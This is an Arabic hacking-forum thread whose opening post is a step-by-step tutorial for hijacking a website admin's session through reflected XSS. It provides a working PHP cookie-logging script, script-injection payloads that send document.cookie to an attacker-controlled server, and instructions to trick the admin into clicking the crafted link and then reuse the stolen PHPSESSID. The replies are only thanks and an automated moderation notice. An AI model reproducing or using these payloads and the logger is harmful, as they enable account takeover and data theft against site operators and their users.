حالة الموضوع:
مغلق
  1. ś‡òÞ Ħąć

    ś‡òÞ Ħąć Developer

    الأنتساب:
    ‏20 مارس 2013
    المشاركات:
    64
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    بسم الله الرحمن الرحيم

    شرح اختراق الموقع عن طريق تغرة اكس اس اس (xss)

    الثغره هده منتشرة مثل تغرة السكيل بل تعتبر من تغرات الحقن

    الطريقة تعتمد على سرقة الكوكيز الخاصة بالادمن والدخول للوحة

    طبعا الكل يعرف كيف يتأكد من ان الموقع مصاب بالتغرة
    غالبا تضع في الرابط او في مكان البحث الكود التالي

    كود:
    ><script>alert("test")</script>
    وطبعا في بعض الاحيان تحتاج الى تشفير الامر بالهيكس
    والمواقع موجودة لتشفير بالهيكس
    ^_^
    الطريقة تحتاج الى ثلاثة اشياء
    ان يسمح الموقع المصاب بتسجيل الاعضاء + ملف بي اتش بي مرفوع على اي موقع + ملف تكست فارغ باسم
    log.txt (تقوم برفعه مع ملف البي اتش بي)
    طبعا بعد التسجيل في الموقع
    ندخل بالعضوية الخاصة فينا
    ونقوم برفع الملف التالي من شل او استضافة تدعم رفع ملفات البي اتش بي

    هذا هو الملف

    كود PHP:
    <?php 

    function GetIP() 

        if (
    getenv("HTTP_CLIENT_IP") && strcasecmp(getenv("HTTP_CLIENT_IP"), "unknown")) 
            
    $ip getenv("HTTP_CLIENT_IP"); 
        else if (
    getenv("HTTP_X_FORWARDED_FOR") && strcasecmp(getenv("HTTP_X_FORWARDED_FOR"), "unknown")) 
            
    $ip getenv("HTTP_X_FORWARDED_FOR"); 
        else if (
    getenv("REMOTE_ADDR") && strcasecmp(getenv("REMOTE_ADDR"), "unknown")) 
            
    $ip getenv("REMOTE_ADDR"); 
        else if (isset(
    $_SERVER['REMOTE_ADDR']) &&  $_SERVER['REMOTE_ADDR'] && strcasecmp($_SERVER['REMOTE_ADDR'],  "unknown")) 
            
    $ip $_SERVER['REMOTE_ADDR']; 
        else 
            
    $ip "unknown"
        return(
    $ip); 


    function 
    logData() 

        
    $ipLog="log.txt"
        
    $cookie $_SERVER['QUERY_STRING']; 
        
    $register_globals = (bool) ini_get('register_gobals'); 
        if (
    $register_globals$ip getenv('REMOTE_ADDR'); 
        else 
    $ip GetIP(); 

        
    $rem_port $_SERVER['REMOTE_PORT']; 
        
    $user_agent $_SERVER['HTTP_USER_AGENT']; 
        
    $rqst_method $_SERVER['METHOD']; 
        
    $rem_host $_SERVER['REMOTE_HOST']; 
        
    $referer $_SERVER['HTTP_REFERER']; 
        
    $date=date ("l dS of F Y h:i:s A"); 
        
    $log=fopen("$ipLog""a+"); 

        if (
    preg_match("/\bhtm\b/i"$ipLog) || preg_match("/\bhtml\b/i"$ipLog)) 
            
    fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |  Agent: $user_agent | METHOD: $rqst_method | REF: $referer | DATE{ : }  $date | COOKIE:  $cookie <br>"); 
        else 
            
    fputs($log"IP: $ip | PORT: $rem_port | HOST: $rem_host |   Agent: $user_agent | METHOD: $rqst_method | REF: $referer |  DATE:  $date | COOKIE:  $cookie \n\n"); 
        
    fclose($log); 


    logData(); 

    ?>
    اوك الان رفعنا الملف على موقع مثلا
    http://server.com/file.php
    وهذا ملف اللوغ
    htp://server.com/log.txt
    والموقع المصاب هو
    Target : Expect More Pay Less

    الان كل شيئ جهاز بقى فقط كود الحقن

    كود:
    "><script language=  "JavaScript">document.location="http://server.com/file.php?cookie=" +   document.cookie;document.location="http://www.target.com"</script>
    الان طريقة الاختراق تعتمد على ارسال كود الحقن الى الادمن (الكود الاخير)
    طبعا في رسالة او على الاميل او اي شيئ
    المهم لازم يضغط كليك على الرابط اللي سيكون في النهاية

    كود:
    http://target.com/search.php?q="><script language=  "JavaScript">document.location="http://yoursite.com/whateveryouwant.php?cookie="  +  document.cookie;document.location="http://www.whateversite.com"</script>
    تضع فقط كود الحقن بعد رابط الملف المصاب في الموقع وترسله الى الادمن
    لما يدخل الادمن على الرابط ستجد الكوكيز في ملف اللوع log.txt اللي رفعنا مع ملف البي اتش بي
    http:server.com/log.txt

    مثال

    كود:
    IP: xxx.xxx.xxx.xx| PORT: xxx| HOST:  |  Agent: Mozilla/5.0 (X11; U;  Linux i686; en-US; rv:1.9.0.8) Gecko/2009032711 Ubuntu/8.10 (intrepid)  Firefox/3.0.8 | METHOD:  | REF: http://target.com/search.php |  
    
    DATE: Tuesday 9th 2013f April 2013 05:04:07 PM | COOKIE:  cookie=PHPSESSID=889c6594db2541db1666cefca7537373
    طبعا اللي يهمنا في اللوغ هو
    PHPSESSID=889c6594db2541db1666cefca7537373
    السيشن اي دي
    ومن خلالها نعدل على الكوكيز الخاص فينا باستعمال احدى ادوات تعديل الكوكيز
    وبمجرد عمل رفريش تجد نفسك ادمن#:"

     
  2. روبورت1

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    الأنتساب:
    ‏8 نوفمبر 2012
    المشاركات:
    654
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    18
    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    [warning]هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.[/warning] ​
     
  3. ŦђĘ βě$Ţ

    ŦђĘ βě$Ţ Developer

    الأنتساب:
    ‏4 مارس 2013
    المشاركات:
    98
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    رد: اختراق الموقع عن طريق تغرة اكس اس اس (xss)

    وعليكم السلام ورحمة الله

    بارك الله فيك اخي على الشرح المميز ​
     
  4. ÍяâΘ

    ÍяâΘ Developer

    الأنتساب:
    ‏30 نوفمبر 2012
    المشاركات:
    63
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    6
    الإقامة:
    ÍŕÁΘ
    رد: اختراق الموقع عن طريق تغرة اكس اس اس (xss)

    وِعليّكم آلسًسًسًلآم وِرحًمة ٱللۂ وِبّركـآتُۂ

    يّعطٌيّك آلعـآفُيّۂ آخٌيّ

    فُيّ آمـآنٌ ٱللۂ
     
  5. 言う者

    言う者 ExpErt DeveloPer

    الأنتساب:
    ‏7 مارس 2012
    المشاركات:
    77
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:
    8
    الإقامة:
    ItaLy
    رد: اختراق الموقع عن طريق تغرة اكس اس اس (xss)

    مبدع كعادتكـ

    الله يعطيك العافيه
     
حالة الموضوع:
مغلق

مشاركة هذه الصفحة